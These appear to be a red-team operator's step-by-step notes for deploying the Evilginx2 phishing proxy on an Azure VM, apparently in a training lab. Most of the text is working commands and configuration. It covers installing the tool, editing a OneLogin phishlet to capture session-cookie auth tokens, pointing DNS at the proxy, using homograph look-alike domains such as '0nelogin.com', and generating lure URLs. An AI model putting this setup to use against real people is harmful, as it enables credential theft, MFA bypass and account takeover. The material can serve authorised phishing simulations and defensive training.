EVILGINX (AWS EC2/AZURE)

this is a relay framework that acts as a web proxy and can be used by red teams to phish credentials. the tool sits in the middle of the traffic and keeps a back-end connection to the legitimate website, to which it forwards the data it receives from the victim. the subdomain on this evilginx vps MUST exactly match the legitimate subdomain being spoofed.

VPS INSTANCE INSTALLATION

#create the ec2/azure instance
root@oco:~$ BROWSER > https://portal.azure.com > Virtual Machines
 Project Details
  Subscription: {subscription}
   Resource Group: {resourceGroup}
 Instance Details
  Virtual Machine Name: {evilginx}
  Region: US
  Availability Options: No Infrastructure Redundancy Required
  Security Type: Standard
  Image: Ubuntu Server 20.04 LTS - x64 Gen2
  VM Architecture: x64
  Run w/ Azure Spot Discount: Disabled
  Size: Standard D2as_v4 - 2 vcpus 8GiB memory ($$$)
 Administrator Account
  Authentication Type: SSH public Key
  Username: {evilginxUser}
  SSH Public Key Source: Generate new key pair
  Key pair name: {arbitraryValue}
 Inbound Port Rules
  Public Inbound ports: None          //this disables public access to the instance
  Select Inbound Ports: N/A
  
 Disks
  Encryption at host: Disabled
  OS Disk
   OS Disk Type: Premium SSD (locally-redundant storage - LRS)
   Delete w/ VM: Enabled
   Key Management: Platform-managed key
   Enable Ultra Disk Compatibility: Disabled
  Data Disks for {evilginx}: Create and attach a new disk
   Name: {evilginx}_DataDisk_0
   Source Type: None (Empty Disk)
   Size: 16 GiB
   Key management: Platform-managed key
   Enable shared disk: No
   Delete disk w/ VM: Enabled
   
 Management
  Network Interface
   Virtual Network: {...LabVNet} 
   Subnet: default (.../24)
   Public IP: {...}
   NIC Network Security Group: Basic
   Public Inbound Ports: None
   Select Inbound Ports: N/A
   Delete NIC when VM is deleted: Disabled
   Enable Accelerated Networking: Enabled
  Load Balancing
   Place VM Behind Existing LB Solution: Disabled
  
  * Create the VM after review

GOLANG & EVILGINX INSTALLATION

#create a DNS A record pointing {subdomain}.{domain}.{tld} to the vps instance ip
#this is required before proceeding

#connect to the ec2 virtual machine
root@evilginx:~$ ssh -i {key}.pem {evilginxUser}@{instanceIP}

#install golang
root@evilginx:~$ go version
root@evilginx:~$ sudo apt update
root@evilginx:~$ sudo apt update && sudo apt upgrade -y
root@evilginx:~$ wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz
 * ALT: sudo apt install golang -y
root@evilginx:~$ sudo tar -xvf go1.11.linux-amd64.tar.gz
root@evilginx:~$ sudo mv go /usr/local
root@evilginx:~$ sudo cp /usr/local/go/bin/go /usr/bin
root@evilginx:~$ nano .profile
 export GOPATH=$HOME/go
 export PATH=$PATH:/usr/local/go:$GOPATH/bin
root@evilginx:~$ source .profile                 //apply the changes to the current shell

#install evilginx
root@evilginx:~$ go get -u github.com/kgretzky/evilginx2
root@evilginx:~$ ls
 go
root@evilginx:~$ cd go
root@evilginx:~$ ls
 bin src
root@evilginx:~$ ls go/bin
 evilginx2
root@evilginx:~$ ls src/github.com/kgretzky/evilginx2/
 ...phishlets templates database
root@evilginx:~$ cd src/github.com/kgretzky/evilginx2/
root@evilginx:~$ ls phishlets
 ...onelogin.yaml amazon.yaml

PHISHLET CONFIGURATION

root@evilginx:~$ cd src/github.com/kgretzky/evilginx2/phishlets

#disable unnecessary statements
root@evilginx:~$ nano onelogin.yaml
 proxy_hosts:
  #-{phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false}
  #-{phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false}
 
 * comment out the statements that are not required in CUOPS

#modify configuration for operations
root@evilginx:~$ nano onelogin.yaml
 proxy_hosts:
  - {phish_sub: 'cwlab', orig_sub: 'cwlab', domain: 'onelogin.com', session: true, is_landing: true}
 auth_tokens:
  - domain: '.onelogin.com'
    keys: ['onelogin.com_user']
  - domain: 'cwlab.onelogin.com'
    keys: ['sub_session_onelogin.com']
 login:
  domain: 'cwlab.onelogin.com'
  path: '/login'
  
#phishlet format; note that the phish subdomain MUST match the legitimate subdomain!
 * legitimate subdomain: {cwlab}.onelogin.com
 * phishing subdomain: {cwlab}.cyberwarfare.live
 
#perform a test to see how a potential target logs in to the legitimate site
root@oco: BROWSER > {cwlab}.onelogin.com
 redirect: https://cwlab.onelogin.com/login2/?retrn=eyJ0...
 
 * this is done IOT see the parameters needed to fully configure evilginx to the operation
#reconfigure the evilginx server hostname to match the target webserver as close as possible - use homographs
root@evilginx:~$ hostname
 evilginx
root@evilginx:~$ sudo nano /etc/hostname
 cyberwarfare.live
root@evilginx:~$ hostnamectl status
 Static Hostname: cyberwarfare.live
root@evilginx:~$ sudo reboot
root@cyberwarfare:~$ hostname
 cyberwarfare.live
root@cyberwarfare:~$ cd $GOPATH/bin
root@cyberwarfare:~$ ls
 evilginx2

#start evilginx2 
root@cyberwarfare:~$ sudo ./evilginx2 -p /home/azureuser/go/src/github.com/kgretzky/evilginx2/phishlets/
 * the -p specifies the phishlets directory
 
#configure the domain
evilginx: config domain cyberwarfare.live
evilginx: config ip {evilginx IP from cloud instance}
 * {4.193.141.23}

#create a DNS A record pointing {cyberwarfare.live} to the vps instance ip
#use own squarespace domain account
root@oco:~$ BROWSER > https://squarespace.com
 Name: cwlab.cyberwarfare.live
 IP: {4.193.141.23}
 Type: A Record
 
root@oco:~$ nslookup cwlab.cyberwarfare.live
 * must resolve to {4.193.141.23}
 
evilginx: phishlets hostname onelogin {cyberwarfare.live}
evilginx: phishlets enable onelogin
 * this cmd will automatically register & set up the TLS/SSL certificate for the domain cyberwarfare.live
 
evilginx: lures create onelogin
evilginx: lures edit 0 redirect_url https://cyberwarfare.live
evilginx: get-url 0
 https://cwlab.cyberwarfare.live/hmHyBQkP
 * this will be the look-alike phishing URL for cwlab.onelogin.com
    - the evilginx domain {cyberwarfare.live} must MATCH the legitimate site as close as possible
       - e.g., using homographs etc
          - legit site: onelogin.com
          - homograph: 0nelogin.com
 * sessions
    - this cmd wasn't shown
